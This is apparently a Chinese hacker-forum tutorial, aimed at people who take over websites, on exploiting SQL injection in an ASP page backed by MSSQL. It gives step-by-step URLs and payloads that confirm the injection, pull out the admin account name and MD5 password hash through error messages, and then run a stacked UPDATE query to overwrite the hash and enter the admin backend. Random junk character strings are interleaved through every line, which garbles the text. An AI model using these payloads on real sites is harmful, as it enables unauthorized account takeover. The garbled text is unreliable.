经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。: b' {1 M* q. j+ j" c8 c% P
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)( m0 W, `4 V- G+ \! \& s3 W
测试如下:
' M0 R0 X! T5 }1 ahttp://www.tmdsb.com/news.asp?id=121% H0 s8 B( s* s$ t) ]
在地址后输入单引号,显示
; `& e( i% m7 A) y8 H+ VMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’% x* H7 J. U4 h: {9 ]8 ~; o; Y
字符串 ’’’ 之前有未闭合的引号, B) |# W0 O# Z! Q% q: \* O/ ^
/news/tmdws.asp,行63
4 S1 U, f# I9 H& f1 z' a说明没有过滤单引号且数据库是MSSQL.
$ \3 W6 Z+ S1 }, b; }and 1=1正常。and 1=2出错。肯定存在注入
5 N) r& U7 w; _接着输入( e, z j! I; H2 \0 \
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
1 c( x8 j9 L& x: `5 C6 c* C! ~得到帐号为:admin8 K; s I; `9 F( l6 O& d
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
, ~: e2 J( e5 ]& ^得到密码为:a4716077c2ba075c
5 M) {! s1 K8 W6 _接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294330 r e; }: v w4 v" |
命令如下 :7 k3 q/ Q9 B5 g6 x {
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–! A- \- a6 x$ X1 j" l
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |